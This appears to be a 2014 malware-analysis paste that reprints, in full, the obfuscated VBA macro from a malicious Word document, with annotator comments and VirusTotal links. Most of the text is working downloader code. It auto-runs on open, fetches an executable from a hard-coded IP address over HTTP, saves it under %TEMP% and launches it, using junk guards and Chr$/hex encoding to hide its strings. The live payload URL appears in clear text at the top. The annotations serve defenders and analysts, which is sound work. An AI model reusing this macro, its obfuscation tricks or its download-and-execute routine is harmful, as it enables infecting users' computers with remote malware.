
Untitled

a guest
Nov 21st, 2014
  1. hi from techhelplist.com
  2.  
  3. macro from malicious .doc:
  4. https://www.virustotal.com/en/file/da7ce3828873c467ecf7d51c34bc354ae7947192d36075d571bebb4b1298ea5a/analysis/
  5.  
  6. tl;dr:
  7. downloads: http://79.137.227.123:8080/get1/get1.php == test.exe (the macro writes the response to %TEMP%\VYEJIUNSXLI.exe and launches it)
  8. https://www.virustotal.com/en/file/7beee0920340d5a610f458ce1ebc0575e7854e88e2cbe1bebd8ec6014b778fe5/analysis/
  9. ---------------------------------------------------------
  10.  
  11. Rem Attribute VBA_ModuleType=VBADocumentModule
  12. Option VBASupport 1
  13. Function kcdygwrfbiu(ByVal yjgkqifjhuh As String, ByVal wyribcufvdf As String) As Boolean
      ' [analysis] Download-and-execute routine of this macro.
      ' [analysis]   yjgkqifjhuh - URL fetched with an HTTP GET through msxml2.xmlhttp.
      ' [analysis]   wyribcufvdf - path the raw response body is written to in binary mode.
      ' [analysis] After the write, shell.application is asked to open a HARD-CODED path
      ' [analysis] (Environ("temp") & "\VYEJIUNSXLI.exe"), not wyribcufvdf; the two only
      ' [analysis] coincide because the single caller on this page passes that same path.
      ' [analysis] The Boolean return value is never assigned, so the function always
      ' [analysis] returns False. There is no error handling anywhere in the body.
      ' [analysis] Defender view: an Office host process instantiating msxml2.xmlhttp,
      ' [analysis] writing an .exe under %TEMP% and then opening it via shell.application.
      ' [analysis] The '????...' comment lines below are the sample's own filler and are
      ' [analysis] kept verbatim.
  14. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  15. Dim ybkppsihihv As Object, ytzewczgyac As Long, dffgyvolwmr As Long, sleabtnazmz() As Byte
  16.  
  17. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
      ' [analysis] Junk guard, repeated throughout the file with different constants:
      ' [analysis]   "If N = N + 1 Then End"        - never true
      ' [analysis]   "If <4-digit> < <2-digit>"     - never true
      ' [analysis]   "If Len(12 chars) = Len(8 chars)" - never true
      ' [analysis] None of the MsgBox calls inside these guards can execute; they only
      ' [analysis] pad the code between the meaningful statements.
  18. If 198146 = 198146 + 1 Then End
  19. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  20. If 7839 < 72 Then
  21. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  22. MsgBox ("ydsyzxcl64")
  23. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  24. End If
  25. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  26. If Len("ykqxxxyl2193") = Len("appahzmy") Then
  27. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  28. MsgBox ("error !!!")
  29. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  30. End If
  31. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
      ' [analysis] Late-bound COM HTTP client; the ProgID string is in clear text here.
  32. Set ybkppsihihv = CreateObject("msxml2.xmlhttp")
  33.  
  34. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
      ' [analysis] Third argument False = synchronous request: the macro blocks until
      ' [analysis] the server answers.
  35. ybkppsihihv.Open "GET", yjgkqifjhuh, False
  36. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  37. If 521349 = 521349 + 1 Then End
  38. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  39. If 8893 < 54 Then
  40. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  41. MsgBox ("likijweg67")
  42. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  43. End If
  44. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  45. If Len("pllhkrlc3166") = Len("sxxznekr") Then
  46. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  47. MsgBox ("error !!!")
  48. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  49. End If
  50. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
      ' [analysis] Sends the request with the constant body "VVhjk". NOTE(review): whether
      ' [analysis] the body is actually transmitted on a GET is not shown here; the
      ' [analysis] literal itself is a fixed string in this sample.
  51. ybkppsihihv.send "VVhjk"
  52.  
  53.  
  54.  
  55.  
  56. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  57. If 376139 = 376139 + 1 Then End
  58. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  59. If 4393 < 36 Then
  60. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  61. MsgBox ("ezhdcheq72")
  62. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  63. End If
  64. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  65. If Len("pkmsyove5253") = Len("tsljbgsj") Then
  66. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  67. MsgBox ("error !!!")
  68. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  69. End If
  70. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
      ' [analysis] Copies the response into the Byte array with no check of the HTTP
      ' [analysis] status or of the content; whatever the server returned is written out.
  71. sleabtnazmz = ybkppsihihv.responsebody
  72.  
  73.  
  74. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  75. If 715735 = 715735 + 1 Then End
  76. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  77. If 4641 < 12 Then
  78. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  79. MsgBox ("ryjrhqnx53")
  80. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  81. End If
  82. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  83. If Len("dygrzarq8814") = Len("gojjpnrl") Then
  84. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  85. MsgBox ("error !!!")
  86. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  87. End If
  88. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
      ' [analysis] Native VBA file I/O: next free file number, used for the write below.
  89. dffgyvolwmr = FreeFile
  90.  
  91. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
      ' [analysis] Opens the destination path (second parameter) for binary access.
  92. Open wyribcufvdf For Binary As #dffgyvolwmr
  93. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  94. If 729374 = 729374 + 1 Then End
  95. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  96. If 4942 < 43 Then
  97. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  98. MsgBox ("nnyvcjng26")
  99. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  100. End If
  101. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  102. If Len("fnfymeib5882") = Len("olspfiwd") Then
  103. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  104. MsgBox ("error !!!")
  105. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  106. End If
  107. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
       ' [analysis] Writes the downloaded bytes to disk in one Put.
  108. Put #dffgyvolwmr, , sleabtnazmz
  109.  
  110. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  111. If 935867 = 935867 + 1 Then End
  112. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  113. If 7842 < 34 Then
  114. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  115. MsgBox ("lkhqhnue85")
  116. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  117. End If
  118. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  119. If Len("ekdpzjqk1116") = Len("rwhcqgpb") Then
  120. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  121. MsgBox ("error !!!")
  122. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  123. End If
  124. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
       ' [analysis] File handle is closed before the launch step so the file is complete
       ' [analysis] on disk when shell.application opens it.
  125. Close #dffgyvolwmr
  126.  
  127. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  128. If 767893 = 767893 + 1 Then End
  129. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  130. If 7329 < 99 Then
  131. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  132. MsgBox ("xvbnvbmi21")
  133. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  134. End If
  135. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  136. If Len("rfebukjb1584") = Len("vuaenced") Then
  137. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  138. MsgBox ("error !!!")
  139. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  140. End If
  141. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  142.  
  143.  
  144. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  145. If 642238 = 642238 + 1 Then End
  146. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  147. If 9112 < 66 Then
  148. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  149. MsgBox ("awvnauwt56")
  150. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  151. End If
  152. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  153. If Len("kynuzhsf1962") = Len("lpemqgqm") Then
  154. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  155. MsgBox ("error !!!")
  156. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  157. End If
  158. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
       ' [analysis] Second late-bound COM object. bikhbouivbl is not in the Dim list above,
       ' [analysis] so it is an implicit variable (no Option Explicit is visible on the page).
  159. Set bikhbouivbl = CreateObject("shell.application")
  160.  
  161. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
       ' [analysis] Launch step. The file name is a clear-text literal here, unlike the
       ' [analysis] hex-encoded copy in the caller, which makes it a convenient static
       ' [analysis] indicator for this sample.
  162. bikhbouivbl.Open Environ("temp") & "\VYEJIUNSXLI.exe"
  163. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  164. If 863523 = 863523 + 1 Then End
  165. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  166. If 8277 < 29 Then
  167. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  168. MsgBox ("tczpuufm31")
  169. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  170. End If
  171. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  172. If Len("ddyihaps3541") = Len("mafrfkwq") Then
  173. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  174. MsgBox ("error !!!")
  175. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  176. End If
  177. '????)??- ?04?-? 3?-??4?39?4???? 2?????????? 0?*(??97 ?( ?0????????0??????????????????
  178.  
  179.  
  180.  
  181. End Function
  182. Sub auto_open()
       ' [analysis] Auto-execution entry point (Auto_Open is the Excel auto-macro name).
       ' [analysis] The three If blocks are never-true junk guards; the only effective
       ' [analysis] statement is the call to vmmtnyfyoid, the routine that decodes the
       ' [analysis] URL and target path and starts the download.
  183. If 342198 = 342198 + 1 Then End
  184. If 6121 < 36 Then
  185. MsgBox ("pwnlbmeg41")
  186. End If
  187. If Len("ayzaarmc1384") = Len("zprgozle") Then
  188. MsgBox ("error !!!")
  189. End If
  190. vmmtnyfyoid
  191.  
  192. End Sub
  193. Sub autoopen()
       ' [analysis] Auto-execution entry point (AutoOpen is the Word auto-macro name, which
       ' [analysis] matches the page's description of a malicious .doc). Apart from the
       ' [analysis] never-true junk guards it only forwards to auto_open.
  194. If 579373 = 579373 + 1 Then End
  195. If 2541 < 28 Then
  196. MsgBox ("nvgsfxxv92")
  197. End If
  198. If Len("nefeixyc5714") = Len("wxsiaalq") Then
  199. MsgBox ("error !!!")
  200. End If
  201. auto_open
  202.  
  203. End Sub
  204. Sub workbook_open()
       ' [analysis] Third entry point, named after the Excel Workbook_Open event handler.
       ' [analysis] Having all three names in one module suggests the same macro body is
       ' [analysis] reused across Word and Excel carriers - an inference, not shown here.
       ' [analysis] Apart from the never-true junk guards it only forwards to auto_open.
  205. If 881586 = 881586 + 1 Then End
  206. If 8712 < 53 Then
  207. MsgBox ("gmlldavd95")
  208. End If
  209. If Len("shniernf9662") = Len("dlzwszbm") Then
  210. MsgBox ("error !!!")
  211. End If
  212. auto_open
  213.  
  214. End Sub
  215. Sub vmmtnyfyoid()
       ' [analysis] Builds the download URL and the drop path, then calls kcdygwrfbiu.
       ' [analysis] String obfuscation is two-layered: each literal is spelled as a chain
       ' [analysis] of Chr$(n) calls that yields the ASCII text of a hex string, and
       ' [analysis] hextostring then turns that hex string into the real value. No URL,
       ' [analysis] "TEMP" or ".exe" text therefore appears in clear in this Sub.
       ' [analysis] The If blocks are the same never-true junk guards as elsewhere, here
       ' [analysis] with their operands encoded too (12-character vs 8-character strings).
  216. If 393732 = 393732 + 1 Then End
  217. If 3669 < 39 Then
  218. MsgBox (hextostring(Chr$(55) & Chr$(65) & Chr$(52) & Chr$(56) & Chr$(55) & Chr$(54) & Chr$(53) & Chr$(54) & Chr$(53) & Chr$(51) & Chr$(53) & Chr$(53) & Chr$(54) & Chr$(69) & Chr$(54) & Chr$(69) & Chr$(51) & Chr$(55) & Chr$(51) & Chr$(52)))
  219. End If
  220. If Len(hextostring(Chr$(52) & Chr$(70) & Chr$(55) & Chr$(57) & Chr$(53) & Chr$(65) & Chr$(52) & Chr$(51) & Chr$(53) & Chr$(55) & Chr$(52) & Chr$(69) & Chr$(55) & Chr$(56) & Chr$(52) & Chr$(67) & Chr$(51) & Chr$(52) & Chr$(51) & Chr$(52) & Chr$(51) & Chr$(50) & Chr$(51) & Chr$(57))) = Len(hextostring(Chr$(52) & Chr$(53) & Chr$(54) & Chr$(50) & Chr$(54) & Chr$(49) & Chr$(53) & Chr$(65) & Chr$(52) & Chr$(54) & Chr$(55) & Chr$(57) & Chr$(53) & Chr$(48) & Chr$(55) & Chr$(53))) Then
  221. MsgBox (hextostring(Chr$(52) & Chr$(53) & Chr$(55) & Chr$(50) & Chr$(55) & Chr$(50) & Chr$(54) & Chr$(70) & Chr$(55) & Chr$(50) & Chr$(50) & Chr$(48) & Chr$(50) & Chr$(49) & Chr$(50) & Chr$(49) & Chr$(50) & Chr$(49)))
  222. End If
       ' [analysis] Decodes to the URL given in the tl;dr at the top of the paste
       ' [analysis] (defanged: hxxp://79.137.227[.]123:8080/get1/get1.php).
       ' [analysis] fdgjhhibjkl7gik is never declared, so it is an implicit variable.
  223. fdgjhhibjkl7gik = hextostring(Chr$(54) & Chr$(56) & Chr$(55) & Chr$(52) & Chr$(55) & Chr$(52) & Chr$(55) & Chr$(48) & Chr$(51) & Chr$(65) & Chr$(50) & Chr$(70) & Chr$(50) & Chr$(70) & Chr$(51) & Chr$(55) & Chr$(51) & Chr$(57) & Chr$(50) & Chr$(69) & Chr$(51) & Chr$(49) & Chr$(51) & Chr$(51) & Chr$(51) & Chr$(55) & Chr$(50) & Chr$(69) & Chr$(51) & Chr$(50) & Chr$(51) & Chr$(50) & Chr$(51) & Chr$(55) & Chr$(50) & Chr$(69) & Chr$(51) & Chr$(49) & Chr$(51) & Chr$(50) & Chr$(51) & Chr$(51) & Chr$(51) & Chr$(65) & Chr$(51) & Chr$(56) & Chr$(51) & Chr$(48) & Chr$(51) & Chr$(56) & Chr$(51) & Chr$(48) & Chr$(50) & Chr$(70) & Chr$(54) & Chr$(55) & Chr$(54) & Chr$(53) & Chr$(55) & Chr$(52) & Chr$(51) & Chr$(49) & Chr$(50) & Chr$(70) & Chr$(54) & Chr$(55) & Chr$(54) & Chr$(53) & Chr$(55) & Chr$(52) & Chr$(51) & Chr$(49) & Chr$(50) & Chr$(69) & Chr$(55) & Chr$(48) & Chr$(54) & Chr$(56) & Chr$(55) & Chr$(48))
  224.  
  225. If 485913 = 485913 + 1 Then End
  226. If 7649 < 42 Then
  227. MsgBox (hextostring(Chr$(52) & Chr$(54) & Chr$(53) & Chr$(56) & Chr$(52) & Chr$(54) & Chr$(52) & Chr$(54) & Chr$(52) & Chr$(54) & Chr$(52) & Chr$(70) & Chr$(54) & Chr$(68) & Chr$(54) & Chr$(68) & Chr$(51) & Chr$(50) & Chr$(51) & Chr$(49)))
  228. End If
  229. If Len(hextostring(Chr$(55) & Chr$(52) & Chr$(55) & Chr$(57) & Chr$(54) & Chr$(56) & Chr$(53) & Chr$(55) & Chr$(52) & Chr$(55) & Chr$(54) & Chr$(67) & Chr$(53) & Chr$(48) & Chr$(53) & Chr$(65) & Chr$(51) & Chr$(56) & Chr$(51) & Chr$(52) & Chr$(51) & Chr$(56) & Chr$(51) & Chr$(57))) = Len(hextostring(Chr$(54) & Chr$(67) & Chr$(54) & Chr$(55) & Chr$(52) & Chr$(70) & Chr$(52) & Chr$(66) & Chr$(54) & Chr$(67) & Chr$(55) & Chr$(52) & Chr$(53) & Chr$(51) & Chr$(54) & Chr$(51))) Then
  230. MsgBox (hextostring(Chr$(52) & Chr$(53) & Chr$(55) & Chr$(50) & Chr$(55) & Chr$(50) & Chr$(54) & Chr$(70) & Chr$(55) & Chr$(50) & Chr$(50) & Chr$(48) & Chr$(50) & Chr$(49) & Chr$(50) & Chr$(49) & Chr$(50) & Chr$(49)))
  231. End If
       ' [analysis] Second argument decodes to Environ("TEMP") & "\VYEJIUNSXLI.exe", the
       ' [analysis] same path kcdygwrfbiu later opens from its own clear-text literal.
       ' [analysis] The Boolean result of kcdygwrfbiu is discarded.
  232. kcdygwrfbiu fdgjhhibjkl7gik, Environ(hextostring(Chr$(53) & Chr$(52) & Chr$(52) & Chr$(53) & Chr$(52) & Chr$(68) & Chr$(53) & Chr$(48))) & hextostring(Chr$(53) & Chr$(67) & Chr$(53) & Chr$(54) & Chr$(53) & Chr$(57) & Chr$(52) & Chr$(53) & Chr$(52) & Chr$(65) & Chr$(52) & Chr$(57) & Chr$(53) & Chr$(53) & Chr$(52) & Chr$(69) & Chr$(53) & Chr$(51) & Chr$(53) & Chr$(56) & Chr$(52) & Chr$(67) & Chr$(52) & Chr$(57) & Chr$(50) & Chr$(69) & Chr$(54) & Chr$(53) & Chr$(55) & Chr$(56) & Chr$(54) & Chr$(53))
  233.  
  234. End Sub
  235. Public Function hextostring(ByVal nhcqwfgej As String) As String
       ' [analysis] String decoder used by vmmtnyfyoid: reads the argument two characters
       ' [analysis] at a time, treats each pair as a hexadecimal byte value and appends the
       ' [analysis] corresponding character to the result, which is returned.
       ' [analysis] The If blocks inside and after the loop are the same never-true junk
       ' [analysis] guards used in the rest of the module and do not affect the output.
  236. Dim nuzmlbfhz As String
  237. Dim ogqyauxcpbviwij As String
  238. Dim fgofrw As Long
  239. For fgofrw = 1 To Len(nhcqwfgej) Step 2
  240. If 987234 = 987234 + 1 Then End
  241. If 7639 < 69 Then
  242. MsgBox ("dibkwffc53")
  243. End If
  244. If Len("aiuvlbwo8571") = Len("xayestix") Then
  245. MsgBox ("error !!!")
  246. End If
       ' [analysis] Chr$(38) & Chr$(72) is "&H", the VBA hex-literal prefix, itself spelled
       ' [analysis] with Chr$ so it does not appear as text; Val("&Hxx") gives the byte value.
  247. nuzmlbfhz = Chr$(Val(Chr$(38) & Chr$(72) & Mid$(nhcqwfgej, fgofrw, 2)))
  248.  
  249. If 243388 = 243388 + 1 Then End
  250. If 2439 < 55 Then
  251. MsgBox ("avaykopy31")
  252. End If
  253. If Len("bmiwoqdu3279") = Len("dzzkdvfa") Then
  254. MsgBox ("error !!!")
  255. End If
  256. ogqyauxcpbviwij = ogqyauxcpbviwij & nuzmlbfhz
  257.  
  258. Next fgofrw
  259. If 987435 = 987435 + 1 Then End
  260. If 7623 < 69 Then
  261. MsgBox ("arrvwigd53")
  262. End If
  263. If Len("apefhibs8563") = Len("wzalodsn") Then
  264. MsgBox ("error !!!")
  265. End If
  266. hextostring = ogqyauxcpbviwij
  267.  
  268. End Function